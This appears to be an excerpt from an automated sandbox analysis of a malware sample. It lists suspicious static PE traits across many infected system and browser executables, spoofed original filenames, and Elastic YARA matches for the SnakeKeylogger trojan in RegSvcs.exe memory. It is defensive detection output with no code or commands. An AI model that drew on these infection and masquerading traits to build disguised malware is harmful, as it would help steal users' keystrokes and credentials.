Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3

Source: msedgewebview2.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: msedge_proxy.exe0.2.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: identity_helper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe.0.dr	Static PE information: Number of sections : 12 > 10
Source: pwahelper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: notification_click_helper.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe0.0.dr	Static PE information: Number of sections : 12 > 10
Source: setup.exe.2.dr	Static PE information: Number of sections : 13 > 10

Source: SABXJ1B5c8.exe, 00000000.00000003.1561352822.0000000003E90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs SABXJ1B5c8.exe
Source: SABXJ1B5c8.exe, 00000000.00000003.1567001099.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs SABXJ1B5c8.exe
Source: SABXJ1B5c8.exe, 00000000.00000003.1597710102.0000000004150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs SABXJ1B5c8.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: SABXJ1B5c8.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: SABXJ1B5c8.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: SABXJ1B5c8.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
